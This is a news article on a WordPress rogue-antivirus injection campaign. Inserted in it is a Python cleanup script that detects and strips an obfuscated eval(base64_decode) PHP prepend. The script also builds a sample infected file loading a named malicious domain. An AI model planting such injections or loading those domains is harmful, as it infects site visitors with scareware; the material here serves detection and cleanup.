Widespread attacks continue against WordPress sites

Powered by SC Magazine

Other sites now targeted as well.

A new campaign to hack WordPress websites and serve rogue anti-virus is underway, according to security researchers.

In addition to WordPress blogs, websites created with other PHP-based platforms, including the Zen Cart eCommerce solution, are affected by the attacks, Regina Smola, co-founder of WPSecurityLock, told SCMagazineUS.com.

Attackers injected malicious JavaScript into the sites, causing visitors to be redirected to scareware domains that attempted to trick users into installing a virus, she said.

Tens of thousands of legitimate sites are believed to be affected.

When visiting one of the compromised sites, users of Internet Explorer or Chrome were redirected to the rogue AV, Smola said. Firefox users were not affected.

Having an up-to-date anti-virus program would block the scareware program from running, she said.

David Dede, lead security researcher at malware detection solutions provider Sucuri Security, told SCMagazineUS.com that all PHP files on affected sites were modified. The malicious JavaScript loaded rogue anti-virus malware from two domains in this case: indesignstudioinfo.com/ls.php and zettapetta.com/js.php.

“The pain to the users is that every single file got infected,” Dede said. “On a normal WordPress site, it is around 1,000 files to clean.”
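The cleanup described above is a grep-and-strip job across roughly a thousand PHP files. As an added example (not the scripts Sucuri released or WPSecurityLock's instructions, which this article does not reproduce), the Python below walks a site tree, flags files that reference the two domains named by Dede, and optionally strips the injected block, keeping a copy of the original beside it. The article only says every PHP file was modified; the assumption that the injection is a prepended `eval(base64_decode("..."))` block is mine, so the matcher also decodes that payload to look for the named hosts inside it. The sample site the script builds is constructed for the demonstration.

```python
"""Scan a PHP tree for the injection discussed above and optionally strip it.

Added example; not Sucuri's or WPSecurityLock's tooling. KNOWN_HOSTS come from
the article. The eval(base64_decode(...)) prepend shape is an ASSUMPTION about
how the modified files looked, not something the article states.
"""
import base64
import os
import re
import shutil
import tempfile

# Indicators named in the article: the injected script loaded the rogue AV
# payload from these two hosts.
KNOWN_HOSTS = ("indesignstudioinfo.com", "zettapetta.com")

# ASSUMPTION: a self-contained PHP block, prepended to each file, that hides
# its payload behind eval(base64_decode("...")). Generic for this injection style.
INJECT_RE = re.compile(
    r"<\?php\s*(?:/\*.*?\*/\s*)?eval\s*\(\s*base64_decode\s*\(\s*"
    r"['\"](?P<b64>[A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*;\s*\?>",
    re.DOTALL,
)


def decode_payload(b64):
    """Best-effort decode of the base64 blob; '' if it is not valid base64."""
    try:
        return base64.b64decode(re.sub(r"\s+", "", b64)).decode("latin-1")
    except (ValueError, TypeError):
        return ""


def find_indicators(text):
    """Return indicator labels found in one file's contents (empty list if clean)."""
    hits = []
    # Plain-text references, e.g. an injected <script src="..."> tag.
    for host in KNOWN_HOSTS:
        if host in text:
            hits.append("plaintext:" + host)
    # Obfuscated prepend: report it, and name any known host in the decoded payload.
    for m in INJECT_RE.finditer(text):
        payload = decode_payload(m.group("b64"))
        referenced = [h for h in KNOWN_HOSTS if h in payload]
        hits.append("eval_base64" + (":" + ",".join(referenced) if referenced else ""))
    return hits


def strip_injection(text):
    """Remove every matching prepend block; return (cleaned_text, blocks_removed)."""
    return INJECT_RE.subn("", text)


def read_text(path):
    with open(path, "r", encoding="utf-8", errors="surrogateescape") as fh:
        return fh.read()


def scan_tree(root, clean=False):
    """Walk root for .php files; return {relative_path: indicators}.

    With clean=True, matching prepend blocks are removed and the untouched
    original is kept beside the file as <name>.infected for later review.
    """
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            text = read_text(path)
            hits = find_indicators(text)
            if not hits:
                continue
            findings[os.path.relpath(path, root)] = hits
            if clean:
                cleaned, n = strip_injection(text)
                if n:
                    shutil.copy2(path, path + ".infected")
                    with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                        fh.write(cleaned)
    return findings


def build_sample_tree():
    """Constructed sample site: one infected file, one clean file. Returns its root."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    os.makedirs(os.path.join(root, "wp-content"))
    # Constructed payload: PHP that emits a script tag pointing at a named host.
    payload = "echo '<script src=\"http://zettapetta.com/js.php\"></script>';"
    b64 = base64.b64encode(payload.encode()).decode()
    injected = '<?php /**/ eval(base64_decode("%s"));?>' % b64
    legit = "<?php\n// Front to the WordPress application.\nrequire __DIR__ . '/wp-blog-header.php';\n"
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(injected + legit)
    with open(os.path.join(root, "wp-content", "clean.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    return root


if __name__ == "__main__":
    site = build_sample_tree()
    print("before:", scan_tree(site))
    print("cleaned:", scan_tree(site, clean=True))
    print("after:", scan_tree(site))
```

Stripping the block only removes the symptom. The article is explicit that the entry point was never established, so a cleaned tree is reinfected within hours if the FTP, hosting-panel and WordPress passwords that may have been used are not rotated first, and reinstalling core and plug-in files from known-good copies is safer than trusting the regex to have caught every variant.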

The affected sites were hosted by a number of US-based hosting providers, including DreamHost, GoDaddy, Bluehost, Media Temple and HostGator, the researchers said. Since all the hacked sites were utilising shared web hosting providers, analysts did not have access to system logs and were not able to conduct a full forensic investigation.

As a result, experts are unsure how the sites were compromised. Attackers may have used stolen FTP or WordPress passwords, launched a brute-force attack against the passwords, or leveraged a vulnerability in either WordPress itself or a WordPress plug-in, Dede wrote in a blog post.

Todd Redfoot, CISO of GoDaddy, said in a statement sent to WPSecurityLock that the attack was targeting websites running outdated versions of WordPress and other online applications. However, a number of sites running the latest version of WordPress also had been compromised, Dede said.

It does not appear that attackers took advantage of an unknown vulnerability in WordPress because, if so, the exploits would be more widespread, he added.

Smola said a brute-force attack against passwords is possible.

“I have found that 99 percent of the sites that we have seen and fixed had very weak passwords to both their FTP and their hosting accounts,” she said.

Others have speculated that the attack may have leveraged a zero-day vulnerability in phpMyAdmin, an open-source tool that allows users to interact with their MySQL databases, Dede said. But there is no evidence of this.

WPSecurityLock has posted instructions for removing the infection, and Sucuri Security has released scripts to automate the process.

This is just the latest wave of attacks against WordPress websites that have been ongoing for the past month, Smola said.

In a previous attack, launched earlier this month, more than 40,000 WordPress sites were affected, she said.

And in April, reports surfaced that some WordPress sites had been compromised to direct users to malicious websites. In that case, the targeted sites appeared to be hosted by Network Solutions. WordPress creator Matt Mullenweg subsequently pinned the blame on improperly configured web servers, which he said are the responsibility of the hosting provider.

"WordPress, like all other web applications, must store database connection info in clear text," Mullenweg said. "Encrypting credentials doesn't matter because the keys have to be stored where the web server can read them in order to decrypt the data. If a malicious user has access to the file system — like they appeared to have in this case — it is trivial to obtain the keys and decrypt the information. When you leave the keys to the door in the lock, does it help to lock the door?"

Network Solutions representatives disagreed.

"This issue is not isolated to Network Solutions, nor is it a Network Solutions server issue," a spokeswoman told SCMagazineUS.com in an email. "We're working with the experts in the WordPress community and understand it is an issue with a WordPress plug-in or theme and it is impacting a number of websites that are hosted on various hosting platforms."

The latest spate of WordPress attacks may be linked to recently compromised websites belonging to the U.S. Department of the Treasury, which were serving malware by exploiting client-side vulnerabilities in visitors' browsers, independent analyst Dancho Danchev said in a blog post.

"The hosting company used by the [Treasury Department's] Bureau of Engraving and Printing had an intrusion, and as a result of that intrusion, numerous websites were affected," he said a statement emailed to SCMagazineUS.com.

The Treasury Department did not name the hosting provider in the statement, but researchers said it was Network Solutions.

See original article on scmagazineus.com

Copyright © SC Magazine, US edition